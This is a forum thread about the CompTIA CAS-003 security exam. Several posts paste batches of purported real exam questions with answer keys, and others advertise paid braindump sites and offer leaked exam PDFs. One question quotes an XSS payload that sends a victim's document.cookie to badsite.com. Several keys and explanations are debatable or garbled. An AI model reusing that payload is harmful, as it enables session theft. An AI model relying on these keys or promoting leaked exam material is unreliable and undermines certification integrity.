Kellyeperry

Reaction score
2018 May New CompTIA CAS-003 Exam Dumps with PDF and VCE Just Updated Today! Following are some new CAS-003 Real Exam Questions:

QUESTION 48
A company has hired an external security consultant to conduct a thorough review of all aspects of corporate security. The company is particularly concerned about unauthorized access to its physical offices resulting in network compromises. Which of the following should the consultant recommend be performed to evaluate potential risks?

A. The consultant should attempt to gain access to physical offices through social engineering and then attempt data exfiltration
B. The consultant should be granted access to all physical access control systems to review logs and evaluate the likelihood of the threat
C. The company should conduct internal audits of access logs and employee social media feeds to identify potential insider threats
D. The company should install a temporary CCTV system to detect unauthorized access to physical offices

Answer: A

QUESTION 49
An agency has implemented a data retention policy that requires tagging data according to type before storing it in the data repository. The policy requires all business emails be automatically deleted after two years. During an open records investigation, information was found on an employee's work computer concerning a conversation that occurred three years prior and proved damaging to the agency's reputation. Which of the following MOST likely caused the data leak?

A. The employee manually changed the email client retention settings to prevent deletion of emails
B. The file that contained the damaging information was mistagged and retained on the server for longer than it should have been
C. The email was encrypted and an exception was put in place via the data classification application
D. The employee saved a file on the computer's hard drive that contained archives of emails, which were more than two years old

Answer: D

QUESTION 50
An advanced threat emulation engineer is conducting testing against a client's network. The engineer conducts the testing in as realistic a manner as possible. Consequently, the engineer has been gradually ramping up the volume of attacks over a long period of time. Which of the following combinations of techniques would the engineer MOST likely use in this testing? (Choose three.)

A. Black box testing
B. Gray box testing
C. Code review
D. Social engineering
E. Vulnerability assessment
F. Pivoting
G. Self-assessment
H. White teaming
I. External auditing

Answer: AEF

QUESTION 51
An insurance company has two million customers and is researching the top transactions on its customer portal. It identifies that the top transaction is currently password reset. Due to users not remembering their secret questions, a large number of calls are consequently routed to the contact center for manual password resets. The business wants to develop a mobile application to improve customer engagement in the future, continue with a single factor of authentication, minimize management overhead of the solution, remove passwords, and eliminate to the contact center. Which of the following techniques would BEST meet the requirements? (Choose two.)

A. Magic link sent to an email address
B. Customer ID sent via push notification
C. SMS with OTP sent to a mobile number
D. Third-party social login
E. Certificate sent to be installed on a device
F. Hardware tokens sent to customers

Answer: CE

QUESTION 52
A security architect is implementing security measures in response to an external audit that found vulnerabilities in the corporate collaboration tool suite. The report identified the lack of any mechanism to provide confidentiality for electronic correspondence between users and between users and group mailboxes. Which of the following controls would BEST mitigate the identified vulnerability?

A. Issue digital certificates to all users, including owners of group mailboxes, and enable S/MIME
B. Federate with an existing PKI provider, and reject all non-signed emails
C. Implement two-factor email authentication, and require users to hash all email messages upon receipt
D. Provide digital certificates to all systems, and eliminate the user group or shared mailboxes

QUESTION 53
The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the following should the ISP implement? (Select TWO).

A. Block traffic from the ISP's networks destined for blacklisted IPs.
B. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP.
C. Scan the ISP's customer networks using an up-to-date vulnerability scanner.
D. Notify customers when services they run are involved in an attack.
E. Block traffic with an IP source not allocated to customers from exiting the ISP's network.

Answer: DE
Explanation:
Since DDOS attacks can originate from nay different devices and thus makes it harder to defend against, one way to limit the company's contribution to DDOS attacks is to notify customers about any DDOS attack when they run services that are under attack. The company can also block IP sources that are not allocated to customers from the existing SIP's network.

QUESTION 55
A small company is developing a new Internet-facing web application.
The security requirements are:
Users of the web application must be uniquely identified and authenticated.
Users of the web application will not be added to the company's directory services.
Passwords must not be stored in the code.
Which of the following meets these requirements?

A. Use OpenID and allow a third party to authenticate users.
B. Use TLS with a shared client certificate for all users.
C. Use SAML with federated directory services.
D. Use Kerberos and browsers that support SAML.

QUESTION 56
A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO).

A. Use AES in Electronic Codebook mode
B. Use RC4 in Cipher Block Chaining mode
C. Use RC4 with Fixed IV generation
D. Use AES with cipher text padding
E. Use RC4 with a nonce generated IV
F. Use AES in Counter mode

Answer: EF

QUESTION 57
A security administrator is assessing a new application. The application uses an API that is supposed to encrypt text strings that are stored in memory. How might the administrator test that the strings are indeed encrypted in memory?

A. Use fuzzing techniques to examine application inputs
B. Run nmap to attach to application memory
C. Use a packet analyzer to inspect the strings
D. Initiate a core dump of the application
E. Use an HTTP interceptor to capture the text strings

Explanation:
Applications store information in memory and this information include sensitive data, passwords, and usernames and encryption keys. Conducting memory/core dumping will allow you to analyze the memory content and then you can test that the strings are indeed encrypted.

QUESTION 58
The Chief Information Security Officer (CISO) at a large organization has been reviewing some security-related incidents at the organization and comparing them to current industry trends. The desktop security engineer feels that the use of USB storage devices on office computers has contributed to the frequency of security incidents. The CISO knows the acceptable use policy prohibits the use of USB storage devices. Every user receives a popup warning about this policy upon login. The SIEM system produces a report of USB violations on a monthly basis; yet violations continue to occur.
Which of the following preventative controls would MOST effectively mitigate the logical risks associated with the use of USB storage devices?

A. Revise the corporate policy to include possible termination as a result of violations
B. Increase the frequency and distribution of the USB violations report
C. Deploy PKI to add non-repudiation to login sessions so offenders cannot deny the offense
D. Implement group policy objects

1.|2018 Latest CAS-003 Exam Dumps (PDF & VCE) 270Q Download:

https://www.braindump2go.com/cas-003.html
2.|2018 Latest CAS-003 Exam Questions & Answers Download:

https://drive.google.com/drive/folders/11eVcvdRTGUBlESzBX9a6YlPUYiZ4xoHE?usp=sharing

jhonaddison

Reaction score
Choose a sure shot way towards your success in CompTIA Advanced Security Practitioner (CASP) CompTIA CASP certification exam with CompTIA CAS-003 dumps of (Dumpspedia.com). We guarantee your CompTIA Advanced Security Practitioner (CASP) success with 100% money back assurance. An exclusive collection of valid and most updated CAS-003 Dumps Questions is the secret behind this assurance. So feel free to get benefits from such valuable CAS-003 Exam Dumps and enjoy brilliant success in CompTIA CASP exam.

Johanna Konig

Reaction score
More: 2018 June New CompTIA CAS-003 Exam Dumps with PDF and VCE Just Updated Today! Following are some new CAS-003 Real Exam Questions:

QUESTION 100
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls. The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be implemented to enable stateless communication?

A. Generate a one-time key as part of the device registration process.
B. Require SSL between the mobile application and the web services gateway.
C. The jsession cookie should be stored securely after authentication.
D. Authentication assertion should be stored securely on the client.

QUESTION 101
A company has noticed recently that its corporate information has ended up on an online forum. An investigation has identified that internal employees are sharing confidential corporate information on a daily basis. Which of the following are the MOST effective security controls that can be implemented to stop the above problem? (Select TWO).

A. Implement a URL filter to block the online forum
B. Implement NIDS on the desktop and DMZ networks
C. Security awareness compliance training for all employees
D. Implement DLP on the desktop, email gateway, and web proxies
E. Review of security policies and procedures

Answer: CD

QUESTION 102
An intruder was recently discovered inside the data center, a highly sensitive area. To gain access, the intruder circumvented numerous layers of physical and electronic security measures. Company leadership has asked for a thorough review of physical security controls to prevent this from happening again. Which of the following departments are the MOST heavily invested in rectifying the problem? (Select THREE).

A. Facilities management
B. Human resources
C. Research and development
D. Programming
E. Data center operations
F. Marketing
G. Information technology

Answer: AEG

QUESTION 103
An attacker attempts to create a DoS event against the VoIP system of a company. The attacker uses a tool to flood the network with a large number of SIP INVITE traffic. Which of the following would be LEAST likely to thwart such an attack?

A. Install IDS/IPS systems on the network
B. Force all SIP communication to be encrypted
C. Create separate VLANs for voice and data traffic
D. Implement QoS parameters on the switches

QUESTION 104
Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased?

A. 0
B. 1
C. 3
D. 6

Answer: C

QUESTION 105
The following has been discovered in an internally developed application:
Error - Memory allocated but not freed:
char *myBuffer = malloc(BUFFER_SIZE);
if (myBuffer != NULL) {
*myBuffer = STRING_WELCOME_MESSAGE;
printf("Welcome to: %s\n", myBuffer);
}
exit(0);
Which of the following security assessment methods are likely to reveal this security weakness? (Select TWO).

A. Static code analysis
B. Memory dumping
C. Manual code review
D. Application sandboxing
E. Penetration testing
F. Black box testing

Answer: AC

QUESTION 106
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's items?

A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking

QUESTION 107
The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?

A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator.
B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud.
C. A SaaS based firewall which logs to the company's local storage via SSL, and is managed by the change control team.
D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware.

QUESTION 108
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?

A. vTPM
B. HSM
C. TPM
D. INE

QUESTION 109
The helpdesk manager wants to find a solution that will enable the helpdesk staff to better serve company employees who call with computer-related problems. The helpdesk staff is currently unable to perform effective troubleshooting and relies on callers to describe their technology problems. Given that the helpdesk staff is located within the company headquarters and 90% of the callers are telecommuters, which of the following tools should the helpdesk manager use to make the staff more effective at troubleshooting while at the same time reducing company costs? (Select TWO).

A. Web cameras
B. Email
C. Instant messaging
D. BYOD
E. Desktop sharing
F. Presence

Answer: CE

QUESTION 110
Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information?

A. Deduplication
B. Data snapshots
C. LUN masking
D. Storage multipaths

1.|2018 Latest CAS-003 Exam Dumps (PDF & VCE) 270Q Download:

https://drive.google.com/drive/folders/11eVcvdRTGUBlESzBX9a6YlPUYiZ4xoHE?usp=sharing

Brian Davis

Reaction score
Hello Johanna,

I hope you are well.

Do you have any newer questions on the latest CAS-003 Exam ?

I look forward to your response. Thanks.

Regards,
Brian.

Zaixkingg

Banned
Banned
Reaction score
I just passed it, I am not a supporter of dumps. But when short time for preparation then I use dumps pdf that's always worked for me, and it's the cheapest. But before using dumps make sure all dumps have up to dates real question answers. One of the best source to buy it https://www.braindumpskey.com/exam/CAS-003.html.

Brian Davis

Reaction score
I just passed it, I am not a supporter of dumps. But when short time for preparation then I use dumps pdf that's always worked for me, and it's the cheapest. But before using dumps make sure all dumps have up to dates real question answers. One of the best source to buy it https://www.braindumpskey.com/exam/CAS-003.html.
===========================

Hello Zaixkingg,

I hope you are well.

What did you score in the CAS-003 exam ?

What sorts of SIM questions appeared on your exam ?

How many questions did you have in the exam ?

Thanks,
Brian.

Zaixkingg

Banned
Banned
Reaction score

Hello Zaixkingg,

I hope you are well.

Thanks,
Brian.
here is my gmail "[email protected]" email me i also share CAS-003 exam questions pdf with you.

Zaixkingg

Banned
Banned
Reaction score
here is my gmail "[email protected]" email me i also share CAS-003 exam questions pdf with you.

Hello Zaixkingg,

I hope you are well.

Thanks,
Brian.
by the way there is No scaled score. 90 questions i have in the CAS-003 exam in which i attempt 83 questions due to shortage of time.

bairstrowjhon

Banned
Banned
Reaction score
I am very happy because few days ago i passed the CompTIA CAS-003 exam with 89% i am very satisaied with this result and the credit goes to Pass4surekey. I practiced this exam with pass4surekey CompTIA CAS-003 Exam Dumps Pdf. All the Questions were same in the exam as given in the Pass4surekey CompTIA CAS-003 Exam Dumps Pdf.

Johanna Konig

Reaction score
2018/November CAS-003 Exam Dumps with PDF and VCE New Updated Today! Following are some new CAS-003 Real Exam Questions:

QUESTION 133
A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO).

A. The X509 V3 certificate was issued by a non trusted public CA.
B. The client-server handshake could not negotiate strong ciphers.
C. The client-server handshake is configured with a wrong priority.
D. The client-server handshake is based on TLS authentication.
E. The X509 V3 certificate is expired.
F. The client-server implements client-server mutual authentication with different certificates.

Answer: BC
Explanation:

QUESTION 134
Which of the following provides the BEST risk calculation methodology?

A. Annual Loss Expectancy (ALE) x Value of Asset
B. Potential Loss x Event Probability x Control Failure Probability
C. Impact x Threat x Vulnerability
D. Risk Likelihood x Annual Loss Expectancy (ALE)

Answer: B
Explanation:

QUESTION 135
Company XYZ finds itself using more cloud-based business tools, and password management is becoming onerous. Security is important to the company; as a result, password replication and shared accounts are not acceptable. Which of the following implementations addresses the distributed login with centralized authentication and has wide compatibility among SaaS vendors?

A. Establish a cloud-based authentication service that supports SAML.
B. Implement a new Diameter authentication server with read-only attestation.
C. Install a read-only Active Directory server in the corporate DMZ for federation.
D. Allow external connections to the existing corporate RADIUS server.

Explanation:

QUESTION 136
A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?

A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks

Explanation:

QUESTION 137
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?

A. Integer overflow
B. Click-jacking
C. Race condition
D. SQL injection
E. Use after free
F. Input validation

Answer: E
Explanation:

QUESTION 138
A large enterprise acquires another company which uses antivirus from a different vendor. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization. Which of the following tools can BEST meet the CISO's requirement?

A. GRC
B. IPS
C. CMDB
D. Syslog-ng
E. IDS

Explanation:

QUESTION 139
A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is a limitation of this approach to risk management?

A. Subjective and based on an individual's experience.
B. Requires a high degree of upfront work to gather environment details.
C. Difficult to differentiate between high, medium, and low risks.
D. Allows for cost and benefit analysis.
E. Calculations can be extremely complex to manage.

Explanation:

QUESTION 140
Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).

A. Jailbroken mobile device
B. Reconnaissance tools
C. Network enumerator
D. HTTP interceptor
E. Vulnerability scanner
F. Password cracker

Answer: DE
Explanation:

QUESTION 141
A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication services for its payment card service, and the other vendor will be providing maintenance to the service provider infrastructure sites. Which of the following business agreements is MOST relevant to the vendors and service provider's relationship?

A. Memorandum of Agreement
B. Interconnection Security Agreement
C. Non-Disclosure Agreement
D. Operating Level Agreement

Explanation:
The Interconnection Security Agreement (ISA) is a document that identifies the requirements for connecting systems and networks and details what security controls are to be used to protect the systems and sensitive data.

QUESTION 142
A well-known retailer has experienced a massive credit card breach. The retailer had gone through an audit and had been presented with a potential problem on their network. Vendors were authenticating directly to the retailer's AD servers, and an improper firewall rule allowed pivoting from the AD server to the DMZ where credit card servers were kept. The firewall rule was needed for an internal application that was developed, which presents risk. The retailer determined that because the vendors were required to have site to site VPN's no other security action was taken.
To prove to the retailer the monetary value of this risk, which of the following type of calculations is needed?

A. Residual Risk calculation
B. A cost/benefit analysis
C. Quantitative Risk Analysis
D. Qualitative Risk Analysis

Explanation:
Performing quantitative risk analysis focuses on assessing the probability of risk with a metric measurement which is usually a numerical value based on money or time.

1.|2018 Latest CAS-003 Exam Dumps (PDF & VCE) 374Q&As Download:

Johanna Konig

Reaction score
More 2018/November Braindump2go New CAS-003 Real Exam Questions:

QUESTION 144
A multi-national company has a highly mobile workforce and minimal IT infrastructure. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. As a result of the dispersed employees and frequent international travel, the company is concerned about the safety of employees and their families when moving in and out of certain countries. Which of the following could the company view as a downside of using presence technology?

A. Insider threat
B. Network reconnaissance
C. Physical security
D. Industrial espionage

Explanation:

QUESTION 145
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?

A. Access control lists
B. SELinux
C. IPtables firewall
D. HIPS

Explanation:

QUESTION 146
News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled by malware on a compromised computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections?

A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology.
B. Implement an application whitelist at all levels of the organization.
C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring.
D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection.

Explanation:

QUESTION 147
Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN?

A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter

Explanation:

QUESTION 148
Wireless users are reporting issues with the company's video conferencing and VoIP systems. The security administrator notices internal DoS attacks from infected PCs on the network causing the VoIP system to drop calls. The security administrator also notices that the SIP servers are unavailable during these attacks. Which of the following security controls will MOST likely mitigate the VoIP DoS attacks on the network? (Select TWO).

A. Install a HIPS on the SIP servers
B. Configure 802.1X on the network
C. Update the corporate firewall to block attacking addresses
D. Configure 802.11e on the network
E. Configure 802.1q on the network

Answer: AD
Explanation:

QUESTION 149
A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialists access patient records over the hospital's guest WiFi network which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and require two factor authentication. Using a remote desktop type interface, the doctors and specialists can interact with the hospital's system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO).

A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.
B. Device encryption has not been enabled and will result in a greater likelihood of data loss.
C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data.
D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.
E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable.

Answer: AD
Explanation:

QUESTION 150
A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" +
request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki e</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?

A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM

Explanation:

QUESTION 151
Company policy requires that all company laptops meet the following baseline requirements:
Software requirements:
Antivirus
Anti-malware
Anti-spyware
Log monitoring
Full-disk encryption
Terminal services enabled for RDP
Administrative access for local users
Hardware restrictions:
Bluetooth disabled
FireWire disabled
WiFi adapter disabled
Ann, a web developer, reports performance issues with her laptop and is not able to access any network resources. After further investigation, a bootkit was discovered and it was trying to access external websites. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO).

A. Group policy to limit web access
B. Restrict VPN access for all mobile users
C. Remove full-disk encryption
D. Remove administrative access to local users
E. Restrict/disable TELNET access to network resources
F. Perform vulnerability scanning on a daily basis
G. Restrict/disable USB access

Answer: DG
Explanation:

QUESTION 152
A security analyst, Ann, states that she believes Internet facing file transfer servers are being attacked. Which of the following is evidence that would aid Ann in making a case to management that action needs to be taken to safeguard these servers?

A. Provide a report of all the IP addresses that are connecting to the systems and their locations
B. Establish alerts at a certain threshold to notify the analyst of high activity
C. Provide a report showing the file transfer logs of the servers
D. Compare the current activity to the baseline of normal activity

Explanation:

QUESTION 153
The security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. The network team has ensured that Layer 2 and Layer 3 connectivity are working. Which of the following tools would a security engineer use to make sure the DNS server is listening on port 53?

A. PING
B. NESSUS
C. NSLOOKUP
D. NMAP

Explanation:

QUESTION 154
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity occurring in the future?

A. Background checks
B. Job rotation
C. Least privilege
D. Employee termination procedures

Explanation:
Job rotation can reduce fraud or misuse by preventing an individual from having too much control over an area.

1.|2018 Latest CAS-003 Exam Dumps (PDF & VCE) 374Q&As Download:

Latest posts